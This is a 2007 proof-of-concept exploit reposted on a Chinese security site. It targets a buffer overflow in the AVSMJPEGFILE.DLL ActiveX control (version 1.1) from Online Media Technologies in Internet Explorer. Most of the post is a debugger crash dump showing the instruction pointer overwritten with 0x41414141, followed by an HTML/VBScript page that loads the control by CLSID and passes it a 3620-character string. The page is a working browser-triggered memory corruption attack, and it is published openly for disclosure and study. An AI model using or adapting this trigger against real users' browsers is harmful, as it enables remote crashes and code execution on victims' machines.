首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Online Media Technologies AVSMJPEGFILE.DLL 1.1 Remote BoF PoC
来源:http://shinnai.altervista.org 作者:shinnai 发布时间:2007-12-12  
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-------------------------------------------------------------------------------
<b>Online Media Technologies AVSMJPEGFILE.DLL 1.1 Remote Buffer Overflow</b>
url: www.avsmedia.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>

<b>Technical details:
File: AVSMJPEGFILE.DLL
Ver.: 1.1.1.102</b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b>Remote execution depends on Internet Explorer settings</b>

faultmon dump:
09:58:13.236  pid=13E4 tid=145C  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION writing [41414141])
              ----------------------------------------------------------------
              EAX=02A31C64: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
              EBX=00001C4A: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=00001448: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ESP=0188C9A4: A0 3F 9B 02 41 41 41 41-41 41 41 41 41 41 41 41
              EBP=0188EE08: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
              ESI=00000A25: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=029B3FA0: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
              EIP=02BF3604: 89 01 E8 0F D6 03 00 83-C4 04 33 C0 8D A5 EC F7
                            --> MOV [ECX],EAX
              ----------------------------------------------------------------

09:58:13.252  pid=13E4 tid=145C  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [41414141])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
              ESP=0188C5D4: BF 37 91 7C BC C6 88 01-80 F2 88 01 D8 C6 88 01
              EBP=0188C5F4: A4 C6 88 01 8B 37 91 7C-BC C6 88 01 80 F2 88 01
              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                            --> N/A
              ----------------------------------------------------------------
-------------------------------------------------------------------------------
<object classid='clsid:4CF945DB-7D52-437B-AD30-185336B44C74' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
  buff = String(3620, "A")
  test.CreateStill buff, 1, True
End Sub
</script>
</span></span>
</code></pre>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MonAlbum 0.87 Upload Shell / P
·Simple HTTPD 1.3 (/aux) Remote
·Nullsoft Winamp 5.32 MP4 tags
·SquirrelMail G/PGP Plugin dele
·Windows Media Player 6.4 MP4 F
·Apple Mac OS X xnu <= 1228.0 L
·Media Player Classic 6.4.9 MP4
·HP OpenView Network Node Manag
·Send ICMP Nasty Garbage (sing)
·Adult Script <= 1.6 Unauthoriz
·Cisco Phone 7940 Remote Denial
·Samba 3.0.27a send_mailslot()
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved